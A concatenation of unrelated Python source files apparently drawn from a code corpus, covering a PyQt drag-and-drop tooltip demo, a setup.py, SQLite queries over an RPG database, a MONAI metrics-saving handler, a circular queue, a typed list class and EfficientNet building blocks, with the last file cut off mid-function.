                QtGui.QIcon(':/images/square.png'), self.createNewSquare)
        self.newTriangleButton = self.createToolButton("New Triangle",
                QtGui.QIcon(':/images/triangle.png'), self.createNewTriangle)
        self.circlePath.addEllipse(0, 0, 100, 100)
        self.squarePath.addRect(0, 0, 100, 100)
        # Build the triangle path relative to the current (start) position.
        x = self.trianglePath.currentPosition().x()
        y = self.trianglePath.currentPosition().y()
        self.trianglePath.moveTo(x + 120 / 2, y)
        self.trianglePath.lineTo(0, 100)
        self.trianglePath.lineTo(120, 100)
        self.trianglePath.lineTo(x + 120 / 2, y)
        self.setWindowTitle("Tooltips")
        self.resize(500, 300)
        self.createShapeItem(self.circlePath, "Circle",
                self.initialItemPosition(self.circlePath),
                self.initialItemColor())
        self.createShapeItem(self.squarePath, "Square",
                self.initialItemPosition(self.squarePath),
                self.initialItemColor())
        self.createShapeItem(self.trianglePath, "Triangle",
                self.initialItemPosition(self.trianglePath),
                self.initialItemColor())
    def event(self, event):
        """Show the hovered item's tooltip; defer everything else to the base class."""
        if event.type() == QtCore.QEvent.ToolTip:
            helpEvent = event
            index = self.itemAt(helpEvent.pos())
            if index != -1:
                QtGui.QToolTip.showText(helpEvent.globalPos(),
                        self.shapeItems[index].toolTip())
            else:
                QtGui.QToolTip.hideText()
                event.ignore()
            return True
        return super(SortingBox, self).event(event)
    def resizeEvent(self, event):
        """Keep the three tool buttons stacked in the bottom-right corner."""
        margin = self.style().pixelMetric(QtGui.QStyle.PM_DefaultTopLevelMargin)
        x = self.width() - margin
        y = self.height() - margin
        y = self.updateButtonGeometry(self.newCircleButton, x, y)
        y = self.updateButtonGeometry(self.newSquareButton, x, y)
        self.updateButtonGeometry(self.newTriangleButton, x, y)
    def paintEvent(self, event):
        """Paint every shape at its own position (translate, draw, untranslate)."""
        painter = QtGui.QPainter(self)
        painter.setRenderHint(QtGui.QPainter.Antialiasing)
        for shapeItem in self.shapeItems:
            painter.translate(shapeItem.position())
            painter.setBrush(shapeItem.color())
            painter.drawPath(shapeItem.path())
            painter.translate(-shapeItem.position())
    def mousePressEvent(self, event):
        """Start dragging the topmost item under the cursor and raise it."""
        if event.button() == QtCore.Qt.LeftButton:
            index = self.itemAt(event.pos())
            if index != -1:
                self.itemInMotion = self.shapeItems[index]
                self.previousPosition = event.pos()
                value = self.shapeItems[index]
                del self.shapeItems[index]
                # NOTE(review): insert at len-1 places the item second-from-last,
                # not last — presumably intended as a move-to-top; verify.
                self.shapeItems.insert(len(self.shapeItems) - 1, value)
                self.update()
    def mouseMoveEvent(self, event):
        if (event.buttons() & QtCore.Qt.LeftButton) and self.itemInMotion:
            self.moveItemTo(event.pos())
    def mouseReleaseEvent(self, event):
        if (event.button() == QtCore.Qt.LeftButton) and self.itemInMotion:
            self.moveItemTo(event.pos())
            self.itemInMotion = None
    def createNewCircle(self):
        """Add a numbered circle at a random position/color."""
        SortingBox.circle_count += 1
        self.createShapeItem(self.circlePath,
                "Circle <%d>" % SortingBox.circle_count,
                self.randomItemPosition(), self.randomItemColor())
    def createNewSquare(self):
        """Add a numbered square at a random position/color."""
        SortingBox.square_count += 1
        self.createShapeItem(self.squarePath,
                "Square <%d>" % SortingBox.square_count,
                self.randomItemPosition(), self.randomItemColor())
    def createNewTriangle(self):
        """Add a numbered triangle at a random position/color."""
        SortingBox.triangle_count += 1
        self.createShapeItem(self.trianglePath,
                "Triangle <%d>" % SortingBox.triangle_count,
                self.randomItemPosition(), self.randomItemColor())
    def itemAt(self, pos):
        """Return the index of the topmost item containing pos, or -1."""
        for i in range(len(self.shapeItems) - 1, -1, -1):
            item = self.shapeItems[i]
            if item.path().contains(QtCore.QPointF(pos - item.position())):
                return i
        return -1
    def moveItemTo(self, pos):
        """Translate the dragged item by the cursor delta since the last event."""
        offset = pos - self.previousPosition
        self.itemInMotion.setPosition(self.itemInMotion.position() + offset)
        self.previousPosition = QtCore.QPoint(pos)
        self.update()
    def updateButtonGeometry(self, button, x, y):
        """Anchor button's bottom-right corner at (x, y); return the next y."""
        size = button.sizeHint()
        button.setGeometry(x - size.width(), y - size.height(),
                size.width(), size.height())
        return y - size.height() - self.style().pixelMetric(QtGui.QStyle.PM_DefaultLayoutSpacing)
    def createShapeItem(self, path, toolTip, pos, color):
        """Create a ShapeItem from the given attributes and repaint."""
        shapeItem = ShapeItem()
        shapeItem.setPath(path)
        shapeItem.setToolTip(toolTip)
        shapeItem.setPosition(pos)
        shapeItem.setColor(color)
        self.shapeItems.append(shapeItem)
        self.update()
    def createToolButton(self, toolTip, icon, member):
        """Build a 32x32 icon button wired to the given slot."""
        button = QtGui.QToolButton(self)
        button.setToolTip(toolTip)
        button.setIcon(icon)
        button.setIconSize(QtCore.QSize(32, 32))
        button.clicked.connect(member)
        return button
    def initialItemPosition(self, path):
        """Vertically centered position; horizontal spot depends on item count."""
        y = (self.height() - path.controlPointRect().height()) / 2
        if len(self.shapeItems) == 0:
            x = ((3 * self.width()) / 2 - path.controlPointRect().width()) / 2
        else:
            x = (self.width() / len(self.shapeItems) - path.controlPointRect().width()) / 2
        return QtCore.QPoint(x, y)
    def randomItemPosition(self):
        """Random position keeping a 120px margin from the right/bottom edges."""
        x = random.randint(0, self.width() - 120)
        y = random.randint(0, self.height() - 120)
        return QtCore.QPoint(x, y)
    def initialItemColor(self):
        """Deterministic hue derived from the current item count."""
        hue = ((len(self.shapeItems) + 1) * 85) % 256
        return QtGui.QColor.fromHsv(hue, 255, 190)
    def randomItemColor(self):
        return QtGui.QColor.fromHsv(random.randint(0, 256), 255, 190)
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
sortingBox = SortingBox()
sortingBox.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
9632252
|
<gh_stars>0
#!/usr/bin/env python3
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
    """Return the contents of *fname*, resolved relative to this file.

    Fixed: the file handle was previously never closed (resource leak);
    a context manager now guarantees closure.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as f:
        return f.read()
# requirements.txt Notes
# Create requirements.txt file command: pip freeze > requirements.txt
# Install requirements.txt file command: pip -r install requirements.txt
# Utility function to read REQUIREMENTS.txt inside a virtual env
# Parses requirements.txt into a list of requirements for the install_requires option.
def requires(fname):
    """Parse a requirements file (next to this file) into a list of requirement strings."""
    req_path = os.path.join(os.path.dirname(__file__), fname)
    with open(req_path) as req_file:
        # strip() drops the trailing newline (and stray whitespace) per line
        return [line.strip() for line in req_file.readlines()]
# Package metadata. Fixed: a missing comma after author_email made this whole
# file a SyntaxError (implicit concatenation with the entry_points dict).
setup(
    name='text-sentiment',
    version='0.1.0',
    packages=find_packages(exclude=['tests',]),
    install_requires=requires('requirements.txt'), #All modules associated with package
    license='Public Domain',
    long_description=read('README'),
    #url='https://example.com', #To github
    #download_url='https://example.com', #Tarball download
    author='<NAME>',
    author_email='<EMAIL>',
    entry_points={
        'console_scripts': ['text-sentiment=text_sentiment.app:main'],
    },
)
|
StarcoderdataPython
|
1625224
|
import sqlite3
# establish a connection with the desired database
conn = sqlite3.connect('rpg_db.sqlite3')
conn # (optional) test the output
# create a cursor -> curs = conn.cursor() -> see loop below
# query for the total number of characters
query = 'SELECT COUNT(DISTINCT character_id) FROM charactercreator_character;'
# queries for the number of characters per subclass
# NOTE(review): query2a joins on mage_ptr_id while the others use
# character_ptr_id — verify against the schema.
query2a = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_necromancer ON character_id = mage_ptr_id'
query2b = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_mage ON character_id = character_ptr_id'
query2c = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_cleric ON character_id = character_ptr_id'
query2d = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_fighter ON character_id = character_ptr_id'
# NOTE(review): table name 'charactercreator_theif' looks misspelled
# ('thief') — confirm the actual table name before changing it.
query2e = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_theif ON character_id = character_ptr_id'
# query for the total number of items
query3 = 'SELECT COUNT(item_id) FROM charactercreator_character_inventory;'
# query for the total number of weapons
query4 = 'SELECT COUNT(*) FROM armory_item INNER JOIN armory_weapon ON item_id = item_ptr_id;'
# query for the number of items held by each character
query5 = 'SELECT character_id, COUNT(item_id) FROM charactercreator_character_inventory GROUP BY character_id LIMIT 20'
# query for the number of weapons held by each character
query6 = 'SELECT character_id, COUNT(item_id) FROM charactercreator_character_inventory INNER JOIN armory_weapon ON item_id = item_ptr_id GROUP BY character_id LIMIT 20;'
# query for the average number of items held by characters
query7 = 'SELECT AVG(count) FROM(SELECT COUNT(item_id) AS count FROM charactercreator_character_inventory GROUP BY character_id);'
# query for the average number of weapons held by characters
query8 = 'SELECT AVG(count) FROM(SELECT COUNT(item_id) AS count FROM charactercreator_character_inventory INNER JOIN armory_weapon ON item_id = item_ptr_id GROUP BY character_id);'
# collect the queries for later execution, e.g.
#   curs = conn.cursor()
#   results = [curs.execute(q).fetchall() for q in queries]
# NOTE(review): nothing in this script actually executes the queries yet.
queries = [query, query2a, query2b,
           query2c, query2d, query2e, query3,
           query4, query5, query6, query7, query8
           ]
|
StarcoderdataPython
|
195106
|
<reponame>tatuanb/monai_V1
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING, Callable, List, Optional, Sequence, Union
from monai.config import IgniteInfo
from monai.data import decollate_batch
from monai.handlers.utils import write_metrics_reports
from monai.utils import ImageMetaKey as Key
from monai.utils import ensure_tuple, min_version, optional_import, string_list_all_gather
Events, _ = optional_import("ignite.engine", IgniteInfo.OPT_IMPORT_VERSION, min_version, "Events")
idist, _ = optional_import("ignite", IgniteInfo.OPT_IMPORT_VERSION, min_version, "distributed")
if TYPE_CHECKING:
from ignite.engine import Engine
else:
Engine, _ = optional_import("ignite.engine", IgniteInfo.OPT_IMPORT_VERSION, min_version, "Engine")
class MetricsSaver:
"""
ignite handler to save metrics values and details into expected files.
Args:
save_dir: directory to save the metrics and metric details.
metrics: expected final metrics to save into files, can be: None, "*" or list of strings.
None - don't save any metrics into files.
"*" - save all the existing metrics in `engine.state.metrics` dict into separate files.
list of strings - specify the expected metrics to save.
default to "*" to save all the metrics into `metrics.csv`.
metric_details: expected metric details to save into files, the data comes from
`engine.state.metric_details`, which should be provided by different `Metrics`,
typically, it's some intermediate values in metric computation.
for example: mean dice of every channel of every image in the validation dataset.
it must contain at least 2 dims: (batch, classes, ...),
if not, will unsqueeze to 2 dims.
this arg can be: None, "*" or list of strings.
None - don't save any metric_details into files.
"*" - save all the existing metric_details in `engine.state.metric_details` dict into separate files.
list of strings - specify the metric_details of expected metrics to save.
if not None, every metric_details array will save a separate `{metric name}_raw.csv` file.
batch_transform: a callable that is used to extract the `meta_data` dictionary of
the input images from `ignite.engine.state.batch` if saving metric details. the purpose is to get the
input filenames from the `meta_data` and store with metric details together.
`engine.state` and `batch_transform` inherit from the ignite concept:
https://pytorch.org/ignite/concepts.html#state, explanation and usage example are in the tutorial:
https://github.com/Project-MONAI/tutorials/blob/master/modules/batch_output_transform.ipynb.
summary_ops: expected computation operations to generate the summary report.
it can be: None, "*" or list of strings, default to None.
None - don't generate summary report for every expected metric_details.
"*" - generate summary report for every metric_details with all the supported operations.
list of strings - generate summary report for every metric_details with specified operations, they
should be within list: ["mean", "median", "max", "min", "<int>percentile", "std", "notnans"].
the number in "<int>percentile" should be [0, 100], like: "15percentile". default: "90percentile".
for more details, please check: https://numpy.org/doc/stable/reference/generated/numpy.nanpercentile.html.
note that: for the overall summary, it computes `nanmean` of all classes for each image first,
then compute summary. example of the generated summary report::
class mean median max 5percentile 95percentile notnans
class0 6.0000 6.0000 7.0000 5.1000 6.9000 2.0000
class1 6.0000 6.0000 6.0000 6.0000 6.0000 1.0000
mean 6.2500 6.2500 7.0000 5.5750 6.9250 2.0000
save_rank: only the handler on specified rank will save to files in multi-gpus validation, default to 0.
delimiter: the delimiter character in CSV file, default to "\t".
output_type: expected output file type, supported types: ["csv"], default to "csv".
"""
def __init__(
self,
save_dir: str,
metrics: Optional[Union[str, Sequence[str]]] = "*",
metric_details: Optional[Union[str, Sequence[str]]] = None,
batch_transform: Callable = lambda x: x,
summary_ops: Optional[Union[str, Sequence[str]]] = None,
save_rank: int = 0,
delimiter: str = "\t",
output_type: str = "csv",
) -> None:
self.save_dir = save_dir
self.metrics = ensure_tuple(metrics) if metrics is not None else None
self.metric_details = ensure_tuple(metric_details) if metric_details is not None else None
self.batch_transform = batch_transform
self.summary_ops = ensure_tuple(summary_ops) if summary_ops is not None else None
self.save_rank = save_rank
self.deli = delimiter
self.output_type = output_type
self._filenames: List[str] = []
def attach(self, engine: Engine) -> None:
    """
    Register this handler's callbacks on the engine.

    Args:
        engine: Ignite Engine, it can be a trainer, validator or evaluator.
    """
    # buffer reset at epoch start, filename collection per iteration,
    # and report writing (self.__call__) at epoch end
    for event, handler in (
        (Events.EPOCH_STARTED, self._started),
        (Events.ITERATION_COMPLETED, self._get_filenames),
        (Events.EPOCH_COMPLETED, self),
    ):
        engine.add_event_handler(event, handler)
def _started(self, _engine: Engine) -> None:
    """
    Initialize internal buffers.

    Args:
        _engine: Ignite Engine, unused argument.
    """
    # rebind (rather than clear in place) so any previously gathered list
    # that escaped via __call__ is not mutated retroactively
    self._filenames = []
def _get_filenames(self, engine: Engine) -> None:
    """Record the filename of every item in the current batch when detail tracking is on."""
    if self.metric_details is None:
        return
    meta_data = self.batch_transform(engine.state.batch)
    if isinstance(meta_data, dict):
        # decollate the `dictionary of list` to `list of dictionaries`
        meta_data = decollate_batch(meta_data)
    self._filenames.extend(f"{item.get(Key.FILENAME_OR_OBJ)}" for item in meta_data)
def __call__(self, engine: Engine) -> None:
    """
    Gather filenames across ranks and write metric reports on the target rank.

    Args:
        engine: Ignite Engine, it can be a trainer, validator or evaluator.
    """
    ws = idist.get_world_size()
    if self.save_rank >= ws:
        raise ValueError("target save rank is greater than the distributed group size.")
    # all gather file names across ranks
    _images = string_list_all_gather(strings=self._filenames) if ws > 1 else self._filenames
    # only save metrics to file in specified rank
    if idist.get_rank() == self.save_rank:
        # keep only the metrics selected by `self.metrics` ("*" selects all)
        _metrics = {}
        if self.metrics is not None and len(engine.state.metrics) > 0:
            _metrics = {k: v for k, v in engine.state.metrics.items() if k in self.metrics or "*" in self.metrics}
        # per-image raw metric details, filtered the same way ("*" selects all)
        _metric_details = {}
        if hasattr(engine.state, "metric_details"):
            details = engine.state.metric_details  # type: ignore
            if self.metric_details is not None and len(details) > 0:
                for k, v in details.items():
                    if k in self.metric_details or "*" in self.metric_details:
                        _metric_details[k] = v
        write_metrics_reports(
            save_dir=self.save_dir,
            # None tells the writer there are no per-image rows to label
            images=None if len(_images) == 0 else _images,
            metrics=_metrics,
            metric_details=_metric_details,
            summary_ops=self.summary_ops,
            deli=self.deli,
            output_type=self.output_type,
        )
|
StarcoderdataPython
|
6412617
|
# Read N item periods, the horizon D and the starting count X from stdin.
N = int(input())
D, X = map(int, input().split())
A = [int(input()) for _ in range(N)]

# Each entry with period `a` contributes 1 + D // a pieces over days 1..D,
# except that when D is an exact multiple of `a` the final piece is excluded.
total = X
for period in A:
    pieces = 1 + D // period
    if D % period == 0:
        pieces -= 1
    total += pieces
print(total)
|
StarcoderdataPython
|
3447504
|
""" Enhanced functions for list. This enhanced list is
strictly typed """
from typing import Generic, TypeVar, Iterable, List
# Generic element type for EnhancedList.
# NOTE: PEP 484 requires the TypeVar's string name to match the variable it is
# assigned to; it was previously declared as TypeVar("T"), which type checkers reject.
Type = TypeVar("Type")
class EnhancedList(list, Generic[Type]):
    """List subclass of a generic element type with fancy-indexing helpers."""

    def __init__(self, *args: Iterable[Type]):
        """Create the list, optionally from an iterable of elements."""
        list.__init__(self, *args)

    def __getitem__(self, key):
        """Receive one or multiple elements from the list.

        If ``key`` is a list, a new ``EnhancedList`` holding the selected
        elements is returned; otherwise the stored value is returned.

        Arguments:
            key: int, List[int] or List[List[int]]
        Returns:
            value: EnhancedList or EnhancedList element
        """
        if isinstance(key, list):
            return EnhancedList([self[i] for i in key])
        return list.__getitem__(self, key)

    def reject_indices(self, indices: List[int]):
        """Return a copy without the elements at the given indices.

        Arguments:
            indices: List[int]
        Returns:
            list without rejected elements: EnhancedList
        """
        # set membership is O(1) per element vs O(len(indices)) for a list
        rejected = set(indices)
        return EnhancedList(elem for i, elem in enumerate(self) if i not in rejected)
|
StarcoderdataPython
|
17806
|
"""
A fixed-capacity queue implemented as circular queue.
Queue can become full.
* enqueue is O(1)
* dequeue is O(1)
"""
class Queue:
    """A fixed-capacity FIFO queue backed by a circular buffer.

    ``first`` indexes the oldest element, ``last`` the next free slot; both
    wrap around modulo ``size``. ``N`` tracks the current element count, so
    empty and full states are unambiguous even when ``first == last``.
    """

    def __init__(self, size):
        self.size = size
        self.storage = [None] * size
        self.first = 0
        self.last = 0
        self.N = 0

    def is_empty(self):
        """Return True when no elements are stored."""
        return self.N == 0

    def is_full(self):
        """Return True when the queue is at capacity."""
        return self.N == self.size

    def enqueue(self, item):
        """Append ``item`` at the tail; raise RuntimeError when full."""
        if self.is_full():
            raise RuntimeError('Queue is full')
        self.storage[self.last] = item
        self.last = (self.last + 1) % self.size
        self.N += 1

    def dequeue(self):
        """Remove and return the oldest item; raise RuntimeError when empty."""
        if self.is_empty():
            raise RuntimeError('Queue is empty')
        item = self.storage[self.first]
        self.first = (self.first + 1) % self.size
        self.N -= 1
        return item
|
StarcoderdataPython
|
6620245
|
""" EfficientNet, MobileNetV3, etc Blocks
Hacked together by / Copyright 2020 <NAME>
"""
import math
import torch
import torch.nn as nn
from torch.nn import functional as F
from .layers import create_conv2d, drop_path, get_act_layer
from .layers.activations import sigmoid
# Defaults used for Google/Tensorflow training of mobile networks /w RMSprop as per
# papers and TF reference implementations. PT momentum equiv for TF decay is (1 - TF decay)
# NOTE: momentum varies btw .99 and .9997 depending on source
# .99 in official TF TPU impl
# .9997 (/w .999 in search space) for paper
BN_MOMENTUM_TF_DEFAULT = 1 - 0.99  # == 0.01 in PyTorch momentum convention
BN_EPS_TF_DEFAULT = 1e-3  # TF default epsilon (larger than PyTorch's 1e-5 default)
# bundled defaults, handed out as a fresh copy by `get_bn_args_tf` below
_BN_ARGS_TF = dict(momentum=BN_MOMENTUM_TF_DEFAULT, eps=BN_EPS_TF_DEFAULT)
def get_bn_args_tf():
    """Return a fresh (shallow) copy of the TF-style BatchNorm defaults."""
    return dict(_BN_ARGS_TF)
def resolve_bn_args(kwargs):
    """Pop BN overrides out of ``kwargs`` and build a BatchNorm kwargs dict.

    Starts from the TF-style defaults when ``bn_tf`` is truthy, then applies
    explicit ``bn_momentum`` / ``bn_eps`` overrides. The consumed keys are
    removed from ``kwargs`` as a side effect.
    """
    bn_args = get_bn_args_tf() if kwargs.pop('bn_tf', False) else {}
    # map caller-facing keys onto the BatchNorm constructor's parameter names
    for src_key, dst_key in (('bn_momentum', 'momentum'), ('bn_eps', 'eps')):
        value = kwargs.pop(src_key, None)
        if value is not None:
            bn_args[dst_key] = value
    return bn_args
# Default Squeeze-Excite configuration consumed by `resolve_se_args`:
# `gate_fn` is the gating activation; `act_layer=None` means "inherit from the
# containing block"; `reduce_mid` chooses mid-channel based reduction;
# `divisor` controls channel rounding of the reduced width.
_SE_ARGS_DEFAULT = dict(
    gate_fn=sigmoid,
    act_layer=None,
    reduce_mid=False,
    divisor=1)
def resolve_se_args(kwargs, in_chs, act_layer=None):
    """Merge caller SE kwargs over `_SE_ARGS_DEFAULT` and resolve fallbacks."""
    # defaults first; caller-provided values win
    se_kwargs = {**_SE_ARGS_DEFAULT, **(kwargs or {})}
    # some models, like MobileNetV3, calculate SE reduction chs from the
    # containing block's mid_ch instead of in_ch
    if not se_kwargs.pop('reduce_mid'):
        se_kwargs['reduced_base_chs'] = in_chs
    # act_layer override; if it remains None the containing block's act_layer is used
    if se_kwargs['act_layer'] is None:
        assert act_layer is not None
        se_kwargs['act_layer'] = act_layer
    return se_kwargs
def resolve_act_layer(kwargs, default='relu'):
    """Pop 'act_layer' from ``kwargs``, resolving string names to layer classes."""
    act_layer = kwargs.pop('act_layer', default)
    # strings are looked up by name; callables pass straight through
    return get_act_layer(act_layer) if isinstance(act_layer, str) else act_layer
def make_divisible(v, divisor=8, min_value=None):
    """Round ``v`` to the nearest multiple of ``divisor`` (at least ``min_value``,
    which defaults to ``divisor``), never dropping more than 10% below ``v``."""
    min_value = min_value or divisor
    rounded = max(min_value, int(v + divisor / 2) // divisor * divisor)
    # Make sure that round down does not go down by more than 10%.
    if rounded < 0.9 * v:
        rounded += divisor
    return rounded
def round_channels(channels, multiplier=1.0, divisor=8, channel_min=None):
    """Round number of filters based on depth multiplier."""
    # a falsy multiplier (0 / None) means "leave the channel count alone"
    if not multiplier:
        return channels
    return make_divisible(channels * multiplier, divisor, channel_min)
class ChannelShuffle(nn.Module):
    """Interleave channels across ``groups``: [N, C, H, W] is viewed as
    [N, g, C/g, H, W], the group axes are transposed, and the result is
    flattened back to [N, C, H, W]."""
    # FIXME haven't used yet
    def __init__(self, groups):
        super(ChannelShuffle, self).__init__()
        self.groups = groups

    def forward(self, x):
        """Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,W] -> [N,C,H,W]"""
        N, C, H, W = x.size()
        g = self.groups
        assert C % g == 0, "Incompatible group size {} for input channel {}".format(
            g, C
        )
        # integer division avoids the float round-trip of the previous int(C / g)
        return (
            x.view(N, g, C // g, H, W)
            .permute(0, 2, 1, 3, 4)
            .contiguous()
            .view(N, C, H, W)
        )
class SqueezeExcite(nn.Module):
    """Squeeze-and-Excitation: global average pool, a two-layer 1x1-conv
    bottleneck, then gate the input channel-wise."""

    def __init__(self, in_chs, se_ratio=0.25, reduced_base_chs=None,
                 act_layer=nn.ReLU, gate_fn=sigmoid, divisor=1, **_):
        super(SqueezeExcite, self).__init__()
        # reduction width derives from reduced_base_chs (or in_chs) scaled by se_ratio
        reduced_chs = make_divisible((reduced_base_chs or in_chs) * se_ratio, divisor)
        self.conv_reduce = nn.Conv2d(in_chs, reduced_chs, 1, bias=True)
        self.act1 = act_layer(inplace=True)
        self.conv_expand = nn.Conv2d(reduced_chs, in_chs, 1, bias=True)
        self.gate_fn = gate_fn

    def forward(self, x):
        # squeeze: spatial mean; excite: bottleneck MLP; gate: rescale the input
        pooled = x.mean((2, 3), keepdim=True)
        gate = self.conv_expand(self.act1(self.conv_reduce(pooled)))
        return x * self.gate_fn(gate)
class ConvBnAct(nn.Module):
    """Plain convolution -> batch-norm -> activation block."""

    def __init__(self, in_chs, out_chs, kernel_size,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU,
                 norm_layer=nn.BatchNorm2d, norm_kwargs=None):
        super(ConvBnAct, self).__init__()
        norm_kwargs = norm_kwargs or {}
        self.conv = create_conv2d(in_chs, out_chs, kernel_size, stride=stride, dilation=dilation, padding=pad_type)
        self.bn1 = norm_layer(out_chs, **norm_kwargs)
        self.act1 = act_layer(inplace=True)

    def feature_info(self, location):
        """Describe the feature tap for ``location`` ('expansion' or 'bottleneck')."""
        if location == 'expansion':  # output of conv after act, same as block output
            return dict(module='act1', hook_type='forward', num_chs=self.conv.out_channels)
        # location == 'bottleneck': the block output itself
        return dict(module='', hook_type='', num_chs=self.conv.out_channels)

    def forward(self, x):
        return self.act1(self.bn1(self.conv(x)))
class DepthwiseSeparableConv(nn.Module):
    """ DepthwiseSeparable block
    Used for DS convs in MobileNet-V1 and in the place of IR blocks that have no expansion
    (factor of 1.0). This is an alternative to having a IR with an optional first pw conv.
    """
    def __init__(self, in_chs, out_chs, dw_kernel_size=3,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
                 pw_kernel_size=1, pw_act=False, se_ratio=0., se_kwargs=None,
                 norm_layer=nn.BatchNorm2d, norm_kwargs=None, drop_path_rate=0.):
        super(DepthwiseSeparableConv, self).__init__()
        norm_kwargs = norm_kwargs or {}
        has_se = se_ratio is not None and se_ratio > 0.
        # residual only possible when spatial size and channel count are preserved
        self.has_residual = (stride == 1 and in_chs == out_chs) and not noskip
        self.has_pw_act = pw_act  # activation after point-wise conv
        self.drop_path_rate = drop_path_rate
        # depthwise conv: one filter per input channel
        self.conv_dw = create_conv2d(
            in_chs, in_chs, dw_kernel_size, stride=stride, dilation=dilation, padding=pad_type, depthwise=True)
        self.bn1 = norm_layer(in_chs, **norm_kwargs)
        self.act1 = act_layer(inplace=True)
        # Squeeze-and-excitation
        if has_se:
            se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
            self.se = SqueezeExcite(in_chs, se_ratio=se_ratio, **se_kwargs)
        else:
            self.se = None
        # pointwise (1x1) conv mixes channels; linear unless pw_act was requested
        self.conv_pw = create_conv2d(in_chs, out_chs, pw_kernel_size, padding=pad_type)
        self.bn2 = norm_layer(out_chs, **norm_kwargs)
        self.act2 = act_layer(inplace=True) if self.has_pw_act else nn.Identity()

    def feature_info(self, location):
        # feature tap: which module to hook and the channel count at that point
        if location == 'expansion':  # after SE, input to PW
            info = dict(module='conv_pw', hook_type='forward_pre', num_chs=self.conv_pw.in_channels)
        else:  # location == 'bottleneck', block output
            info = dict(module='', hook_type='', num_chs=self.conv_pw.out_channels)
        return info

    def forward(self, x):
        residual = x
        x = self.conv_dw(x)
        x = self.bn1(x)
        x = self.act1(x)
        if self.se is not None:
            x = self.se(x)
        x = self.conv_pw(x)
        x = self.bn2(x)
        x = self.act2(x)
        if self.has_residual:
            # stochastic depth, applied on the residual branch only
            if self.drop_path_rate > 0.:
                x = drop_path(x, self.drop_path_rate, self.training)
            x += residual
        return x
class FinalLayer(nn.Module):
    """Head block: 1x1 conv up to ``num_features`` channels, then norm and activation."""

    def __init__(self, in_chs, num_features, pad_type, norm_kwargs, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU6):
        super(FinalLayer, self).__init__()
        self._in_chs = in_chs
        self.num_features = num_features
        self.conv_head = create_conv2d(self._in_chs, self.num_features, 1, padding=pad_type)
        self.bn2 = norm_layer(self.num_features, **(norm_kwargs or {}))
        self.act2 = act_layer(inplace=True)

    def forward(self, x):
        return self.act2(self.bn2(self.conv_head(x)))
class InvertedResidual_easy(nn.Module):
    # NOTE(review): this class is identical to `FinalLayer` above
    # (1x1 conv -> norm -> activation); consider consolidating the two.
    def __init__(self, in_chs, num_features, pad_type, norm_kwargs, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU6):
        super(InvertedResidual_easy, self).__init__()
        self._in_chs = in_chs
        self.num_features = num_features
        norm_kwargs = norm_kwargs or {}
        self.conv_head = create_conv2d(self._in_chs, self.num_features, 1, padding=pad_type)
        self.bn2 = norm_layer(self.num_features, **norm_kwargs)
        self.act2 = act_layer(inplace=True)

    def forward(self, x):
        # 1x1 conv -> norm -> activation
        x = self.conv_head(x)
        x = self.bn2(x)
        x = self.act2(x)
        return x
class InvertedResidual(nn.Module):
    """ Inverted residual block w/ optional SE and CondConv routing"""
    def __init__(self, in_chs, out_chs, dw_kernel_size=3,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
                 exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
                 se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
                 conv_kwargs=None, drop_path_rate=0.):
        super(InvertedResidual, self).__init__()
        norm_kwargs = norm_kwargs or {}
        conv_kwargs = conv_kwargs or {}
        # expanded (middle) width, rounded to hardware-friendly multiples
        mid_chs = make_divisible(in_chs * exp_ratio)
        has_se = se_ratio is not None and se_ratio > 0.
        # skip connection is only valid when the tensor shape is preserved
        self.has_residual = (in_chs == out_chs and stride == 1) and not noskip
        self.drop_path_rate = drop_path_rate
        # Point-wise expansion
        self.conv_pw = create_conv2d(in_chs, mid_chs, exp_kernel_size, padding=pad_type, **conv_kwargs)
        self.bn1 = norm_layer(mid_chs, **norm_kwargs)
        self.act1 = act_layer(inplace=True)
        # Depth-wise convolution (carries the stride)
        self.conv_dw = create_conv2d(
            mid_chs, mid_chs, dw_kernel_size, stride=stride, dilation=dilation,
            padding=pad_type, depthwise=True, **conv_kwargs)
        self.bn2 = norm_layer(mid_chs, **norm_kwargs)
        self.act2 = act_layer(inplace=True)
        # Squeeze-and-excitation
        if has_se:
            se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
            self.se = SqueezeExcite(mid_chs, se_ratio=se_ratio, **se_kwargs)
        else:
            self.se = None
        # Point-wise linear projection (no activation: linear bottleneck)
        self.conv_pwl = create_conv2d(mid_chs, out_chs, pw_kernel_size, padding=pad_type, **conv_kwargs)
        self.bn3 = norm_layer(out_chs, **norm_kwargs)

    def feature_info(self, location):
        # feature tap: which module to hook and the channel count at that point
        if location == 'expansion':  # after SE, input to PWL
            info = dict(module='conv_pwl', hook_type='forward_pre', num_chs=self.conv_pwl.in_channels)
        else:  # location == 'bottleneck', block output
            info = dict(module='', hook_type='', num_chs=self.conv_pwl.out_channels)
        return info

    def forward(self, x):
        residual = x
        # Point-wise expansion
        x = self.conv_pw(x)
